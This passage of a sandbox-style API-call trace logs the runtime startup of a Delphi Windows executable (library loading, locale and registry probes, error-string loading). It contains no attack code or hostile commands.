GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0098.000] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0098.001] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0098.001] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0098.001] GetProcAddress 
(hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0098.001] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0098.001] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0098.001] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0098.001] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0098.001] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0098.001] SetThreadLocale (Locale=0x400) returned 1 [0098.002] GetVersion () returned 0x1db10106 [0098.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.002] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0098.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.002] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0098.002] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.002] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0098.002] GetSystemInfo (in: lpSystemInfo=0x12fc34 | 
out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0098.002] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0098.002] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0098.002] GetACP () returned 0x4e4 [0098.002] GetCurrentThreadId () returned 0xbc0 [0098.002] GetVersion () returned 0x1db10106 [0098.002] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x711ca8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0098.003] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.003] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.003] VirtualAlloc 
(lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1410000 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0098.003] GetUserDefaultUILanguage () returned 0x409 [0098.004] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0098.004] GetThreadUILanguage () returned 0x120409 [0098.004] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0098.004] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x153a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x153a680, pcchLanguagesBuffer=0x12d768) returned 1 [0098.004] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.en-US", 
lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] GetUserDefaultUILanguage () returned 0x409 [0098.005] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0098.005] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0098.005] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0098.005] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: 
lpBuffer="Assertion failed") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, 
cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0098.006] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0098.006] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0098.006] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0098.006] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724428 [0098.006] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0098.006] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, 
dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0098.007] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0098.007] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0098.007] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.007] WideCharToMultiByte (in: 
CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0098.007] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x15080dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0098.007] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0098.007] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe")) returned 0x30 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0098.007] GetThreadLocale 
() returned 0x409 [0098.007] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0098.007] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0098.007] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0098.008] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0098.008] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0098.008] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x724438 [0098.008] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0098.008] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0098.008] GetLastError () returned 0x7a [0098.008] GetLogicalProcessorInformation (in: Buffer=0x14f99d0, ReturnedLength=0x12fab0 | out: Buffer=0x14f99d0, ReturnedLength=0x12fab0) returned 1 [0098.008] GetCurrentThreadId () returned 0xbc0 [0098.008] GetCurrentThreadId () returned 0xbc0 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0098.008] GetThreadLocale () returned 0x409 [0098.008] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0098.008] GetThreadLocale () returned 0x409 [0098.008] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0098.008] GetCurrentThreadId () returned 0xbc0 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: 
lpLCData="Monday") returned 7 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0098.008] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | 
out: lpLCData="March") returned 6 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: 
lpLCData="November") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 
[0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0098.009] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0098.010] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarNot") returned 0x76c8ec66 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarAdd") returned 0x76c35934 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarSub") returned 0x76c8d332 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarMul") returned 0x76c8dbd4 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarDiv") returned 0x76c8e405 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarIdiv") returned 0x76c8f00a [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarMod") returned 0x76c8f15e [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarAnd") returned 0x76c35a98 [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarOr") returned 0x76c8ecfa [0098.010] GetProcAddress (hModule=0x76c10000, lpProcName="VarXor") returned 0x76c8ee2e [0098.010] GetProcAddress 